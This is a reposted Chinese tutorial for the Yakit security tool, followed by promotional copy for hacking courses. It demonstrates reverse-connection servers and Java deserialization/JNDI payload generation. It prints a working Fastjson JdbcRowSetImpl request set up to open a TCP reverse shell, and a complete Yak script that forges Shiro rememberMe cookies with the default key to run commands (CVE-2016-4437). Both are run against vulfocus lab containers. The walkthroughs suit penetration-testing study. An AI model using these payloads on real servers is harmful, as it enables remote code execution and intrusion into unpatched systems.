麻花痒 发表于 2024-10-20 01:15:26

新功能史上最好用的反连&JavaHack,安全本领基座强化ing



反序列化、类加载、JNDI漏洞使用是Java漏洞中特别常见的几种类型,但相对来说使用过程又是较为复杂的。以是Yakit提供了两个特别好用的功能,无需Java环境,仅需一个Yakit。
下面先介绍下使用方法再演示下实战使用。
反连服务器

返连服务可用于手工渗透测试,既可用于漏洞检测,也可用于漏洞使用。
https://i-blog.csdnimg.cn/blog_migrate/0d7d142d073987975f2b602701dcb337.png 
本地启动

初始页面如图(如果有配置公网反连,则会自动启用公网穿透,并自动填写Bridge信息),反连地址默认是获取本机的第一块网卡IP

https://i-blog.csdnimg.cn/blog_migrate/0523a298aabe6cf3f90e703415cda10c.jpeg
https://i-blog.csdnimg.cn/blog_migrate/bbcbdef0a96f361572abb09821b28ffb.jpeg
启动乐成后如图,根据需求填写蓝色提示框内的地址

https://i-blog.csdnimg.cn/blog_migrate/99358336a22fce65acf6b00d5bb42a1d.jpeg
漏洞检测

写一段java代码测试下毗连

https://i-blog.csdnimg.cn/blog_migrate/4365d064e8f7c5b9005cd9fd09d58ba9.jpeg
在Yakit上可以看见收到哀求,token为aaa,返回内容为<empty>(代表响应内容为空)

https://i-blog.csdnimg.cn/blog_migrate/ba1ed609a263a700601c9e53ea9b0a4c.jpeg
漏洞使用

在返连页面右上角有个Payload配置,开启后可以看见左面出现雷同 Yso-Java Hack 的页面,在这里可以配置payload,命令填写open /System/Applications/Calculator.app,然后点生成。可以看见返连地址自动添加了token。

https://i-blog.csdnimg.cn/blog_migrate/4f8434cf12499a6fea9e6839c51e2985.jpeg
复制新地址,再试一下毗连ldap,发现弹出计算器

https://i-blog.csdnimg.cn/blog_migrate/a076329492691d3cca74d57911c8dccc.jpeg
在 Yakit 上可以看见使用流程: 受害端发出 ldap 哀求,Yakit 返回一个 reference 类,指向一个 web 地址 -> 受害端访问 web 地址,Yakit 返回一个恶意类 -> 受害端加载恶意类导致命令实行。

https://i-blog.csdnimg.cn/blog_migrate/47e72a6f511ba63fc4291478119811c8.jpeg
公网穿透

对于公网的目标,反连服务就必要在公网监听了,一是可以将Yak引擎公网部署,二是可以在公网搭建Bridge,这里主要讲下第二种方法。
起首必要在假造服务器上安装 Yak 引擎(实行bash <(curl -sS -L http://oss.yaklang.io/install-latest-yak.sh)举行安装),实行yak grpc --secret yourpassword启动Bridge,更多介绍可以看这篇文章《想拥有自己的 Yak Bridge? DNSLog、ICMPLog、TCPLog 全部免费》。
如图输入 Bridge 地址和暗码,启动(如果报错 connection refused 则表示毗连 Bridge 失败,检查下暗码是否正确、端口是否乐成开启、服务器上是否有防火墙限定、云服务控制台上是否设置了安全计谋)

https://i-blog.csdnimg.cn/blog_migrate/a412da01108da33f09c986b4c66f92f0.jpeg
https://i-blog.csdnimg.cn/blog_migrate/c29fdfe60751cb96bd7d8e86c31d3f74.png
毗连乐成后可以看到反连地址的 IP 已经变为 Bridge 服务器的 IP 了,接下来的操作和本地启动雷同。
Yso-Java Hack

页面初始状态如图,左侧配置 payload 参数,右侧用来展示生成的 payload

https://i-blog.csdnimg.cn/blog_migrate/eaa5aee4192b6c82597c71be177eb412.jpeg
生成序列化payload

默认开启 “使用使用链”,即生成序列化 payload ,一级选项是使用链,二级选项是恶意类。鼠标放到小问号上可以看到介绍。

https://i-blog.csdnimg.cn/blog_migrate/a3e8d8167687225bd9cedfa932f25dbc.jpeg
选择使用链和恶意类后,会出现配置表单,类名默认是随机生成的,填写全部表单信息,点击生成,就可以在右侧看到生成的 payload ,点击上方可以切换展示方式。

https://i-blog.csdnimg.cn/blog_migrate/3d78110349e0077c0ed73dc429ea83ed.jpeg

https://i-blog.csdnimg.cn/blog_migrate/a54993e423c52c34f48a4d881d7e1954.jpeg
还可以展示生成payload的代码,还可以将代码发送到Yak Runner,师傅们写插件时如果懒得写,就可以直接在这里直接生成代码。

https://i-blog.csdnimg.cn/blog_migrate/44c3a6b8e0029288629ab327627414f1.jpeg
最新版本 payload 展示类型增加了一个 DUMP ,可以看到 payload 的数据结构,像下面这样。

https://i-blog.csdnimg.cn/blog_migrate/3efa8b150e32524fd650bb3ae28ba329.jpeg
生成恶意类

如图,关闭 “使用使用链” 就可以生成恶意类,具体操作和生成使用链雷同

https://i-blog.csdnimg.cn/blog_migrate/8c254e7461d47ba0cc2698940aa5fec0.jpeg
可以看见关闭 “使用使用链” 时多了一个启动反连服务按钮,下面再看一下反连服务。
共同反连使用

在配置好恶意类后,点击启动反连,就可以使用当前恶意类直接启动反连了(如果配置了公网反连则使用此配置启动,否则使用本地启动,如果启动失败,请自行在高级配置里配置反连地址),如图

https://i-blog.csdnimg.cn/blog_migrate/0834059cd034a038c32da358faa37fcb.jpeg
实战测试

新功能介绍完了,下面看下实战场景吧,以 Fastjson 和 shiro 使用为例
Fastjson测试

这里使用 vulfocus 启动一个 CNVD-2017-02833 实例,攻击流程如下

[*] 在 假造服务器 启动一个 yak 引擎yak grpc --host 0.0.0.0,Yakit 端输入服务器地址和端口(默认8087),毗连

[*] 打开Yakit的端口监听器,监听一个端口,以 8086 为例

https://i-blog.csdnimg.cn/blog_migrate/1e58918760718d79098b7a18b92137d1.jpeg

[*] 启动反连服务器并配置恶意类为 TCPReverseShell ,主机填 假造服务器的 ip ,端口填上面监听的 8086 ,点击应用
https://i-blog.csdnimg.cn/blog_migrate/89bcc312c2f1aba67fe9081cc809b942.png 

[*] 打开 webfuzzer,发送 Payload
POST / HTTP/1.1
Host: 目标地址
Content-Type: application/json

{
    "a":{
      "@type":"java.lang.Class",
      "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
      "@type":"com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName":"<这里填写 “LDAP反连地址” 或 “RMI反连地址” >",
      "autoCommit":true
    }
}
如图,反连列表中可以看见乐成收到 LDAP 和 HTTP 哀求,说明目标乐成加载了恶意类(如果只收到 LDAP 哀求,没有 HTTP 哀求,大概是目标未开启 com.sun.jndi.ldap.object.trustURLCodebase )

https://i-blog.csdnimg.cn/blog_migrate/ae986a4ffe07a05840758a4e5d65fa76.jpeg
端口监听器收到了目标机器的毗连

https://i-blog.csdnimg.cn/blog_migrate/75ec8e89bc45fd99aad1dcea08e4cd87.jpeg

Shiro测试

使用vulfocus/shiro-CVE-2016-4437镜像搭建环境,启动Yakit
打开Yso-Java Hack,使用链选择CommonsBeanutils1,恶意类选择RuntimeExec,填写命令,生成Yak代码

https://i-blog.csdnimg.cn/blog_migrate/8f7844b259cbee3a9b330911d5415dea.jpeg
编写Yak脚本
// 生成key
base64Key=`kPH+bIxk5D2deZiIxcaaaA==`
key,_ = codec.DecodeBase64(base64Key)
// 生成payload
gadgetObj,err = yso.GetCommonsBeanutils1JavaObject(yso.useRuntimeExecEvilClass("touch /tmp/111"),yso.obfuscationClassConstantPool(),yso.evilClassName("yVeqoYww"))
if err != nil {
    println(err.Error())
    return
}
payload,err = yso.ToBytes(gadgetObj)
// 加密payload
payload = codec.PKCS5Padding(payload, 16)
encodePayload = codec.AESCBCEncrypt(key, payload, nil)
finalPayload = codec.EncodeBase64(append(key, encodePayload...))
// 发送payload
rsp,req,err = poc.HTTP(`GET /login HTTP/1.1
Host: 目标
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie: rememberMe={{params(payload)}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36

`,poc.params({"payload":finalPayload}))
headers, _ = str.SplitHTTPHeadersAndBodyFromPacket(rsp)
println(string(headers)) 实行后进入容器看见/tmp目次下多了111文件,使用乐成
总结

有些Java漏洞的使用太繁琐了,必要java环境、多种工具共同使用、还要在假造服务器上看回显、记各种命令…
对比之下 Yakit 真的太好用了。本次更新的两个功能基本上可以解决大部门Java漏洞使用的场景,希望师傅们多多使用,欢迎提出意见。
题外话

初入计算机行业的人或者大学计算机相关专业结业生,许多因缺少实战经验,就业处处碰钉子。下面我们来看两组数据:


[*]2023届全国高校结业生预计到达1158万人,就业形势严峻;
[*]国家网络安全宣传周公布的数据表现,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届结业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学结业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长显着,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均到达了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科结业生结业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
https://i-blog.csdnimg.cn/blog_migrate/96345e50482421f0ad2fc5a2532c534e.png
“没有网络安全就没有国家安全”。当前,网络安全已被提拔到国家战略的高度,成为影响国家安全、社会稳固至关重要的因素之一。 
网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
https://i-blog.csdnimg.cn/blog_migrate/2730744053ea5cc5456ac25ab6513b2e.png
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民当局》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,如今从事网络安全行业的从业人员只有10W人。
https://i-blog.csdnimg.cn/blog_migrate/d9ced8939c42a6b403279cd4ff7093e1.png
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产物司理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁谍报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是把握工作中的焦点网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人本领的不停提拔,所从事工作的职业代价也会随着自身经验的丰富以及项目运作的成熟,升值空间一起看涨,这也是为什么受大家欢迎的主要缘故原由。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,由于技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全怎样学习

本日只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
 1.学习门路图 https://i-blog.csdnimg.cn/blog_migrate/493642f34a88415d6dc94c93f89876e4.png

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的门路图,如果你能学完它们,你去就业和接私活完全没有题目。
https://i-blog.csdnimg.cn/blog_migrate/05d5a3958c540782c779ce239924c175.png
2.视频教程

网上固然也有许多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面门路图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
https://i-blog.csdnimg.cn/blog_migrate/e4c9d5839279afdb6dbc15f633f402ce.jpeg
https://i-blog.csdnimg.cn/blog_migrate/4d8f837096084519071c14cc66a06bdb.jpeg
(都打包成一块的了,不能一一睁开,统共300多集)
因篇幅有限,仅展示部门资料,必要保存下方图片,微信扫码即可前去获取
https://i-blog.csdnimg.cn/blog_migrate/da0978ef6af71e48b677588cb2b2ebd6.png
3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 https://i-blog.csdnimg.cn/blog_migrate/67106fad66cddd885de7c23abf59e723.png
 因篇幅有限,仅展示部门资料,必要保存下方图片,微信扫码即可前去获取
https://i-blog.csdnimg.cn/blog_migrate/f14112df90296450a1dd1dd33946f51a.png
4.工具包、口试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要会合在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同砚不容错过。 
https://i-blog.csdnimg.cn/blog_migrate/b043384385502591f84ee1ac1dfbcf52.png
 还有我视频里讲的案例源码和对应的工具包,必要的话也可以拿走。
因篇幅有限,仅展示部门资料,必要保存下方图片,微信扫码即可前去获取
https://i-blog.csdnimg.cn/blog_migrate/d7709600359194cb4cc5a7be7a11fd20.png
末了就是我这几年整理的网安方面的口试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在口试深信服、奇安信、腾讯或者别的大厂口试时常常碰到的,如果大家有好的题目或者好的见解欢迎分享。
参考分析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包罗、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
https://i-blog.csdnimg.cn/blog_migrate/d6389404441f6ea51d124b0455df73f9.png
 因篇幅有限,仅展示部门资料,必要保存下方图片,微信扫码即可前去获取 https://i-blog.csdnimg.cn/blog_migrate/518d1d711fa07101f67827884925ee1e.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 新功能史上最好用的反连&JavaHack,安全本领基座强化ing